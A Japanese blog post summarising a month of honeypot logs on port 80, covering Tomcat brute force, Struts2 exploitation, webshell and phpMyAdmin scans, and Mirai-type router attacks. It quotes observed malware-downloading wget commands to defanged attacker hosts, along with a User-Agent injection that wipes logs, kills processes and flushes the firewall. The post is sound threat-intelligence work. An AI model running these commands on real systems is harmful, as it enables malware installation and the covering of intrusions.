ハニーポットのログ分析まとめ(2018年09月度)
2018年09月度のWOWHoneypotのログ分析まとめです。
前置き:WOWHoneypotを使って80/tcpのアクセスログを観測しています。
■日次のアクセス数
アクセス数が多い日は主にTomcatの管理ページへのブルートフォース攻撃があった日となります。
■アクセスパス
この1ヶ月間でのアクセスをメソッド+パスによって分類すると計531種来ていました。
トップ20は以下になります。
件数 | 種別 | リクエスト |
17340 | GET /manager/html | Tomcat管理ページへのブルートフォース攻撃 |
935 | GET / | アクセス |
202 | GET /index.action | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 |
135 | POST /qq.php | phpのWebShell設置の調査 |
73 | GET /cmd.php | phpのWebShell設置の調査 |
72 | POST /xx.php | phpのWebShell設置の調査 |
72 | POST /q.php | phpのWebShell設置の調査 |
68 | GET /shell.php | phpのWebShell設置の調査 |
67 | GET /www/phpMyAdmin/index.php | phpMyAdminの調査 |
67 | GET /tools/phpMyAdmin/index.php | phpMyAdminの調査 |
65 | GET /web/phpMyAdmin/index.php | phpMyAdminの調査 |
65 | GET /phpMyAdmin/phpMyAdmin/index.php | phpMyAdminの調査 |
64 | POST /s.php | phpのWebShell設置の調査 |
64 | GET /phpMyAdmin/index.php | phpMyAdminの調査 |
64 | GET /claroline/phpMyAdmin/index.php | phpMyAdminの調査 |
61 | GET /admin/phpMyAdmin/index.php | phpMyAdminの調査 |
53 | POST /test.php | phpのWebShell設置の調査 |
49 | POST /qaq.php | phpのWebShell設置の調査 |
41 | GET /phpMyAdmin/scripts/setup.php | phpMyAdminの調査 |
40 | POST /db.init.php | phpのWebShell設置の調査 |
■ハンティングログ
主に任意のコード実行の脆弱性でマルウェア本体を取得しに行くようなログをまとめたものです。遮断してしまって良いものです。
検知したものは主にMirai系、Struts2が多かったです。
件数 | リクエスト |
40 | wget -c hxxp://wap.tfddos[.]net:57843/linux |
34 | wget hxxp://77.87.77[.]250/izuku.sh |
25 | wget -c hxxp://222.186.138[.]8:3333/bbbiu |
16 | wget hxxp://80.211.173[.]159/k |
10 | wget -c hxxp://43.226.152[.]13:6565/Linux-syn25000 |
8 | wget hxxp://185.10.68[.]163/worldwest.sh |
7 | wget hxxp://80.211.106[.]251/sh |
5 | wget hxxp://148.72.176[.]78/ngynx |
3 | wget hxxp://77.73.69[.]246/dl |
2 | wget</string><string>hxxp://185.10.68[.]163/worldwest.sh |
2 | wget -P /root/ hxxp://222.73.85[.]188:1996/.yam;wget -P /root/ hxxp://222.73.85[.]188:1996/install.sh;wget -P /root/ hxxp://222.73[.]85.188:1996/config.json |
2 | wget hxxp://212.237.32[.]62/k |
2 | wget hxxp://209.141.33[.]86/d |
2 | wget hxxp://148.72.176[.]78/ken.sh |
1 | wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server |
1 | wget -P /root/ hxxp://222.73.85[.]188:1996/.centos64;wget -P /root/ hxxp://222.73.85[.]188:1996/.centos32 |
1 | wget -P /root/ hxxp://222.73.85[.]188:1996/.centos32;wget -P /root/ hxxp://222.73.85[.]188:1996/.centos64 |
1 | wget${IFS}hxxp://185.10.68[.]163/worldwest.sh |
1 | wget hxxp://80.211.148[.]109/bins.sh |
1 | wget hxxp://185.172.164[.]41/e |
1 | wget hxxp://159.89.204[.]166/d |
1 | wget hxxp://128.199.251[.]119/t.php |
1 | wget hxxp://104.148.70[.]5:8080/net7000 |
1 | wget -c hxxp://aaa.linuxa[.]club:57843/linux |
1 | wget -c hxxp://43.226.146[.]23:2422/qbz95 |
1 | wget -c hxxp://23.249.162[.]123:9998/servic |
1 | wget -c hxxp://103.55.13[.]68:13333/nux |
■アクセス元IP
この1ヶ月間でアクセスのあったIP数は1167IPとなります。
モノによっては件数が多いですが、大抵は一度に大量に来るのみで継続してアクセスのあるIPは稀です。
アクセス元IPを世界地図でマッピングすると以下のようになります。
トップ50は以下になります。
■ドメイン名でのアクセス
途中から取得したドメイン名に対するアクセスは以下です。
特に宣伝等していなければ、大したものは来ないようです。
件数 | パス |
73 | GET / |
29 | GET /robots.txt |
3 | HEAD / |
1 | GET /sitemap.xml |
1 | GET /favicon.ico |
1 | GET /ads.txt |
以下、個別のアクセスに対する分析です。
■Tomcatの管理ページに対するブルートフォース攻撃
この1ヶ月で一番多かったものですが、やはり過去から見ても傾向として非常に多いことがわかります。
■.phpファイルへのアクセス
いろんなパスに対してきますが、アクセス数が横並びになるパスも多く、ツールで回されている感じがします。
■Mirai系アクセス
主にD-Linkの脆弱性を突く攻撃とGPONルータの脆弱性を突く攻撃が来ていました。
それぞれ以下のようなUser-Agentできていました。
・D-Link
件数 | User-Agent |
49 | Hakai/2.0 |
18 | LMAO/2.0 |
3 | Shinka/2.0 |
3 | Gemini/2.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
1 | Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop; |
・GPON
件数 | User-Agent |
24 | Hello, World |
3 | CarlosMatos/69.0 |
■余談
当ブログですが、10月頭で10,000アクセスを超えました、ありがとうございます。
アクセス元の8割弱はGoogleの検索からで、何かのログを調査しようとした際に当ブログが引っかっているのかと思います。調査した内容が役に立っている可能性が高そうと思っており、当初の目的通りで良かったです。
残りの2割り程度はtwitterからで、日次で記載してツイートしたものから見に来てもらっているものと思われます。
ありがとうございます!
以上です。